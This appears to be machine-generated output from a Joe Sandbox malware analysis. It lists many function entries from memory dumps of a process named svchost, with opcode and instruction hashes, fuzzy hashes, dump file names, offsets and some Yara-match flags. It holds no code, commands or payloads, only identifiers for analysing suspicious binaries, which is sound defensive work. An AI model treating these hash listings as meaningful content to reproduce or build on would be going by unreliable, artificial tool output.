                                                          • API String ID:
                                                          • Opcode ID: a9ca1f758236a251bfed1a50216bfb3a6522f01011ad6bf9533e38a4539a7931
                                                          • Instruction ID: fefc5ffeb383530c5e2180fd2e312fa1d8a101aa28224aed39ba449d7aceca20
                                                          • Opcode Fuzzy Hash: a9ca1f758236a251bfed1a50216bfb3a6522f01011ad6bf9533e38a4539a7931
                                                          • Instruction Fuzzy Hash: 3522D235A00216CFCB19CF59C590ABAF7B2FF8A354B28456DDA56DB344DB30E942CB90
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3c867be53c2c554a3f566d98594122699f75c8394f273a8fa809e1c6b3fb0a79
                                                          • Instruction ID: 713a091efd85b061d5f0daae6aa6635ce90b7cb63c11f0220c2d48bebeec2b20
                                                          • Opcode Fuzzy Hash: 3c867be53c2c554a3f566d98594122699f75c8394f273a8fa809e1c6b3fb0a79
                                                          • Instruction Fuzzy Hash: B222C074900609EFDB14DFA8C990BAEB7B5FF48310F2485A9E814AB345E734EA41CF94
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f3c9ed4017a950788a82ec1e33b39c764cc97a159b6fa27348b8f8f352682b8e
                                                          • Instruction ID: f6a95d6246a762919c9bc2b7a830d9026c456047c68e0439d7a6c1d2335a00bf
                                                          • Opcode Fuzzy Hash: f3c9ed4017a950788a82ec1e33b39c764cc97a159b6fa27348b8f8f352682b8e
                                                          • Instruction Fuzzy Hash: 6522A0396047128FC718CF18C5A0A2AF7E5FF89314B188A6DEA96CB355D730E846CF95
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 921b4d64fdf1f3747df45ebbf0b0b76e4727f4034c00df19a952bb80b22f996e
                                                          • Instruction ID: 4eea2e779686f4d18fae863b40b9a6ef5343e1f97b2945d1547aa2154636d119
                                                          • Opcode Fuzzy Hash: 921b4d64fdf1f3747df45ebbf0b0b76e4727f4034c00df19a952bb80b22f996e
                                                          • Instruction Fuzzy Hash: E8222C70E0021ADBDF14CF95C5809BEFBFAAF48704F5980AAE845AB641E734D942CB64
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 13bc9af504f2530e96f97f51d774b37fb01662b80aa5f0667db837b5a7e565b2
                                                          • Instruction ID: 8c0abc78a8da9414d67baf34fc8c10ac618f3b6b71d50f8e6f646745f4709499
                                                          • Opcode Fuzzy Hash: 13bc9af504f2530e96f97f51d774b37fb01662b80aa5f0667db837b5a7e565b2
                                                          • Instruction Fuzzy Hash: C802F1386046518FDB24CF2AC560275FBF1AF85300B18899AEAD6CF385D734E996DF60
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 76af3d37fb99fd25720d3d2cfbc5b7e11662ce655a14b4671dc3a543c1aab988
                                                          • Instruction ID: f9ed8900d0aeb0feac583f280e43213b4e6b9345a3805a930769628e90632104
                                                          • Opcode Fuzzy Hash: 76af3d37fb99fd25720d3d2cfbc5b7e11662ce655a14b4671dc3a543c1aab988
                                                          • Instruction Fuzzy Hash: 96F1D572E006159BCB18CFA9C9A067EFBF5EF8821071D41ADD456DB3C1E674EA41CB90
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                          • Instruction ID: 2b6b21a0785698fed17ee5e32339b20878ea2cc0abbd71516026ba708af41775
                                                          • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                          • Instruction Fuzzy Hash: 38026E73E547164FE720CE4ACDC4765B3A3EFC8311F5B81B8CA142B613CA79BA525A90
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 987e90e0317f7beebd37cfb0e00b4d08b2c0129b6aedab55b7fb7f44ae0aa99d
                                                          • Instruction ID: b1aa32e138c63196a12cec60a54d469bd11cb139553bf05c460e55cca820a912
                                                          • Opcode Fuzzy Hash: 987e90e0317f7beebd37cfb0e00b4d08b2c0129b6aedab55b7fb7f44ae0aa99d
                                                          • Instruction Fuzzy Hash: 80F1A472E00626DBCB58CE68C5A15BDFBF5AF45210B1A426DD856EB3C0D734EE41CB90
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8010ce45e0ca5b65d77275f35b6bc2585a90d57dca97f7c3348b01d0fd3c1fd6
                                                          • Instruction ID: a5d9c1cc6756645560d32020e50053c85bd54a0cb99d226ebeca0b9decb8939c
                                                          • Opcode Fuzzy Hash: 8010ce45e0ca5b65d77275f35b6bc2585a90d57dca97f7c3348b01d0fd3c1fd6
                                                          • Instruction Fuzzy Hash: 1CF19E74900609DFDB14DFA8C990AAEBBB4FF48314F2885A9E805AB345E735DE45CF90
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 97dcbc98dd073d32445dd83acc64614abdc571c4c56d133366cb7132bfb3e57b
                                                          • Instruction ID: fc5695926bf62b9d70b73769767bef4fe7f839e459530ca2f36111d164f9f1ed
                                                          • Opcode Fuzzy Hash: 97dcbc98dd073d32445dd83acc64614abdc571c4c56d133366cb7132bfb3e57b
                                                          • Instruction Fuzzy Hash: 74D1D475A00B269BCF14DF64CD90ABEBBA5BF48304F0A862DE815DB280E734D951CF60
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ee857fa14aabb1be21e19baf028e6706fa68c92290f976f78203a0ac7558595e
                                                          • Instruction ID: 3b7e56ce361057f84eb1eda0137a8e6e57f663a650ececcc2bca19ba4394d633
                                                          • Opcode Fuzzy Hash: ee857fa14aabb1be21e19baf028e6706fa68c92290f976f78203a0ac7558595e
                                                          • Instruction Fuzzy Hash: 56D16D71E043198BEF28CE98C6847BDBBB5FB44304F18807AEC46AB394D7B58942DB45
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 333c961a9cff4e48df7ab8e775c01a65bfe6ccee337e4c1d836dd67a6f2cbc31
                                                          • Instruction ID: b207525476c52080fb5963b0f7b7b0a587839f7318416a3bd6bf9320df47fb20
                                                          • Opcode Fuzzy Hash: 333c961a9cff4e48df7ab8e775c01a65bfe6ccee337e4c1d836dd67a6f2cbc31
                                                          • Instruction Fuzzy Hash: ECE19E75A00205CFDB18CF58C980BAAB7F5FF58310F28819AE855EB391D734EA51CB90
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 405e4545d23e6fb1806599b31c255339c2895dcb403d3a20b6b260611907791c
                                                          • Instruction ID: 81a68c6de8afb1d907fbccfbe3fa0bd8278a453d77ebdbbaf4a87c306e508e1d
                                                          • Opcode Fuzzy Hash: 405e4545d23e6fb1806599b31c255339c2895dcb403d3a20b6b260611907791c
                                                          • Instruction Fuzzy Hash: 23C19371E002159FEF25CF5AC940BAEFBB9EF55314F18826AD915AB390D770E942CB80
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d3d6c2a61c50af119dbf7a660be9dd8e78e4cce8ee85c1312ee98e55f77ac127
                                                          • Instruction ID: 28fe0ac811d8182d9156b160cb8acfffcc89aeffc9be2ba6e8e79c3451fa453f
                                                          • Opcode Fuzzy Hash: d3d6c2a61c50af119dbf7a660be9dd8e78e4cce8ee85c1312ee98e55f77ac127
                                                          • Instruction Fuzzy Hash: 35B11622A105148BEF1CCA18C9A137EA35BEFD5311F1EC2BAEC178F7E9D63999418341
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                          • Instruction ID: 1cff2c35c934c8664bb098d3b870562248167d92752a262949fa799f3bc78de3
                                                          • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                          • Instruction Fuzzy Hash: 6CB1AF74A00745AFDB24DF95CA40AEBBBBDFF84304F14446DA9429B790DA30E985CF54
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                          • Instruction ID: 419b0005f14b0e3bf6aa7146815f086bd5a135973496a7311b4c7590387125fa
                                                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                          • Instruction Fuzzy Hash: 3BB11875A00655AFDF26DB68CA50BBEFBFAEF84200F190199D642DB381DB30D942CB50
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ceca652abe237944913a9097d39f7c91e3a77b9f3614988b18095d378dece6dd
                                                          • Instruction ID: 4faea40c2820b22c5fcc7fac65593395a82cbd17494c5d58d54f318269d9e4d0
                                                          • Opcode Fuzzy Hash: ceca652abe237944913a9097d39f7c91e3a77b9f3614988b18095d378dece6dd
                                                          • Instruction Fuzzy Hash: B4A13B75900215AFEF12EFA4CC95BAE77B9EF46750F054068FA00AF2A0D7759C10CBA4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4221b2808ee087ba493f626103dd1ef2757fa7d8fe4cbc8f2c51a61941d6f1aa
                                                          • Instruction ID: bdaff764204ba1014785d391d8eb2df08658de79e0794ff7b24941d0a5606772
                                                          • Opcode Fuzzy Hash: 4221b2808ee087ba493f626103dd1ef2757fa7d8fe4cbc8f2c51a61941d6f1aa
                                                          • Instruction Fuzzy Hash: 09C15874108341CFDB64CF15C584BAAB7E8FF89304F54496EE9898B391D774E909CB92
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 48bc216d829923493dd270a460af4106c0d14bddfc2769e2557a7001edde511e
                                                          • Instruction ID: 2df9a3e8f7594e1d586e11595edcfc901b3f24a430b61e9a3bbf7f02362f5867
                                                          • Opcode Fuzzy Hash: 48bc216d829923493dd270a460af4106c0d14bddfc2769e2557a7001edde511e
                                                          • Instruction Fuzzy Hash: 28A1C275B0071ADBDB24DF69CA90BAAB7F5FF44314F544129EA059B381DB34E812CBA0
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9cf7f9dc5bbf36aa4036818c41c611e67494ee787b3ff3d1cdec9d7e6caf99e3
                                                          • Instruction ID: 53ca6b3277a7d85d5cf29ac61d86c2ced907437e83c4afc2a5ebe85cb8061c8f
                                                          • Opcode Fuzzy Hash: 9cf7f9dc5bbf36aa4036818c41c611e67494ee787b3ff3d1cdec9d7e6caf99e3
                                                          • Instruction Fuzzy Hash: 8A91B071E00215AFDF15CFA8D884BEEBBB5AF48710F154169EA51EB341D738E9808FA4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5d616f5919d897e354ac29de96d2566417727a05479a8be3d768175794912c6c
                                                          • Instruction ID: e879bded4ebd538b1e04037936284470d3c8512bd5666b691589c0908e484ab7
                                                          • Opcode Fuzzy Hash: 5d616f5919d897e354ac29de96d2566417727a05479a8be3d768175794912c6c
                                                          • Instruction Fuzzy Hash: 02914635E002118BEB28DB28D540B7EB7E9FF84714F1944AEE8059F340E736D842C761
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3cb5f7391e0fe50eabf392035cd150940a4dbb4700d0086fa58e00fd5f0cd7d9
                                                          • Instruction ID: 41b5a84c715f62e2c60f16e53d6b9b55c0fc937b5ccf2a5d43878836a8fcd288
                                                          • Opcode Fuzzy Hash: 3cb5f7391e0fe50eabf392035cd150940a4dbb4700d0086fa58e00fd5f0cd7d9
                                                          • Instruction Fuzzy Hash: C2B11275A093408FD364DF28C580A5AFBF1BB89304F184A6EF899CB352D371E945CB96
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                          • Instruction ID: 94b9815d1a960a76b41378a3b9ce08b8e942fd6703b077cf29579abf751db6a8
                                                          • Opcode Fuzzy Hash: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                          • Instruction Fuzzy Hash: 51815A35E047969FDB22CEADC9C026EBF55EF52280F2C467ED4428B341CA64DC86CB91
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                                          • Instruction ID: 58df7eb7d6f137e6ce696f83bdaef88c361c0be0a56c0375513600389175f6c5
                                                          • Opcode Fuzzy Hash: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                                          • Instruction Fuzzy Hash: 0E915E72620A06CFD725CF2DC985666FBE0FF55324BA88E18E4E6DB6A0D375E511CB00
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 851202130379acd59c86d2f68b7f993cd87ff14a86f1856e471556738efef0cb
                                                          • Instruction ID: b2694a7e9168e3df326d95bc7eb6a888cea653db386469314faa4d7e9f77148c
                                                          • Opcode Fuzzy Hash: 851202130379acd59c86d2f68b7f993cd87ff14a86f1856e471556738efef0cb
                                                          • Instruction Fuzzy Hash: A891C272E00206AFDB14CF28C9807AAB7F5AF48310F188578EA65DF395D775E951CB90
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 13072db3191975d68780cf433e347c59b2cdd669a4a35afab76843672bf2aa3d
                                                          • Instruction ID: 8c895e4c701944a022572da94e3412ea33d8353cd91f3ee3896ca8a23fc6b787
                                                          • Opcode Fuzzy Hash: 13072db3191975d68780cf433e347c59b2cdd669a4a35afab76843672bf2aa3d
                                                          • Instruction Fuzzy Hash: 4C91D172A105158FCB18CF69C8916BEBBF1FF88310F19C6A9D915EB39AD634D901CB50
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8d610b0706af8bc4bb234ecae75c18eebaf8b7ba9ef6ff6dcbdc89237cefb721
                                                          • Instruction ID: c0fc5958b7db9b03d3cbbb57b51655d97cb2fa284e41ec2f1ac4b3e7a019f1f3
                                                          • Opcode Fuzzy Hash: 8d610b0706af8bc4bb234ecae75c18eebaf8b7ba9ef6ff6dcbdc89237cefb721
                                                          • Instruction Fuzzy Hash: 8A81C572E006199FCB14CFA9C8805AEB7F5FF88314B1843AAD925E7384D774E952CB94
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cfcd2fae845ed1753c7806fd0dc16dce7a1da570da8912fd9aadb3cc032d8098
                                                          • Instruction ID: a9b8d2871385d72c6a5496616e51ea7ee9702001330006b557ef07782a2fa7ad
                                                          • Opcode Fuzzy Hash: cfcd2fae845ed1753c7806fd0dc16dce7a1da570da8912fd9aadb3cc032d8098
                                                          • Instruction Fuzzy Hash: EB81B531E00669DFDB54CF69C9809AEFBB6FFC5210B28C2A9E9159B345D730E941CB90
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e6ecadc6af6f6564b5b88e0b27afa5f9d4c09e0bddbdddaaed5eaee11a3c3a22
                                                          • Instruction ID: 624a3f2d23c98f74624a83d947d5b359e19f1fec3def24c56df4bd01eda65fcc
                                                          • Opcode Fuzzy Hash: e6ecadc6af6f6564b5b88e0b27afa5f9d4c09e0bddbdddaaed5eaee11a3c3a22
                                                          • Instruction Fuzzy Hash: A3819E76E012159BCB28CF98C5906ADFBF1EF88310F1981AED816EF384D7359941CB90
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                          • Instruction ID: ff22e22474763143547d60868f56b409364860c9c314972ca1ffb0ef42e0d7a7
                                                          • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                          • Instruction Fuzzy Hash: 09816E75A102099FCF18DF98C990AAEB7B6BF88314F18816DDA1A9B344D774E902CF54
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c34efe96b01752687c324abe32ead6038e8d3dc51e14ef09dd1e7e51f7bb3039
                                                          • Instruction ID: 6d5412ca90aecd2b8fb21ea2ff54c0ec8020d8f265b3144181178ff8a61c0412
                                                          • Opcode Fuzzy Hash: c34efe96b01752687c324abe32ead6038e8d3dc51e14ef09dd1e7e51f7bb3039
                                                          • Instruction Fuzzy Hash: 24619131B001195BCB1CCE1DCE9467AB3A2EBD4315B18857AED09AF7C1E6B9ED1187C4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                          • Instruction ID: f8037da70403c99489649c026d356e9af231e6c65b59dac8a39e5c8a44cbe037
                                                          • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                          • Instruction Fuzzy Hash: 00818E76E001198BEF24CF58C9807AEFBB6FB84354F19816BD815BB384D6329A45CB91
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6e4a74121a11b51bcf66b1f26568438ee62395aabf247e2c0118dbd40dd1ac2c
                                                          • Instruction ID: 1a67cb47911470719adf8e82fc76fc8aa272ef0936939d76771c26d0d59d1e21
                                                          • Opcode Fuzzy Hash: 6e4a74121a11b51bcf66b1f26568438ee62395aabf247e2c0118dbd40dd1ac2c
                                                          • Instruction Fuzzy Hash: 2C815E75A00609AFDB25CBA9C980AEAF7F9FB88384F14442DE555A7250D731AC05CB60
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 27bd6665eebbe9252200d9d72294f3ae764312e555e2d07ab8564476d4949803
                                                          • Instruction ID: 0ae3eea919f807434a1953d7e50e4b019f2c5b91369d1de5c44610cbfdf9a765
                                                          • Opcode Fuzzy Hash: 27bd6665eebbe9252200d9d72294f3ae764312e555e2d07ab8564476d4949803
                                                          • Instruction Fuzzy Hash: 5271C7346047509EEB24CE2ACA40736B7E5EB85714F18856EFC96CB2C4D7B6E806CB61
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 32ca9a2898a3091104c0b9a673ec9122262dc989aec52ab5ec99077dbf311cfb
                                                          • Instruction ID: d78069826596cbd17330e0451963b1a27972ff8b0ea2748a3b3424b81ec231b4
                                                          • Opcode Fuzzy Hash: 32ca9a2898a3091104c0b9a673ec9122262dc989aec52ab5ec99077dbf311cfb
                                                          • Instruction Fuzzy Hash: 5171CDB5C01265EFDB25CF59CA90BBEBBB8FF59700F14815AE842AB350D7749805CBA0
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f88b33934a605b52a66c14ba0c71ba7898b6c83f9b7fbf8b8ec90a9ac055b007
                                                          • Instruction ID: 8b854468e276c8476428b1a367887518a6f4f2a1eebc4c13a754978c32bc8bd1
                                                          • Opcode Fuzzy Hash: f88b33934a605b52a66c14ba0c71ba7898b6c83f9b7fbf8b8ec90a9ac055b007
                                                          • Instruction Fuzzy Hash: 0C819C70D01295DFCB24CF69C544AAAFBF8EF4AB40F048499E495AB385D374D84ADF50
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
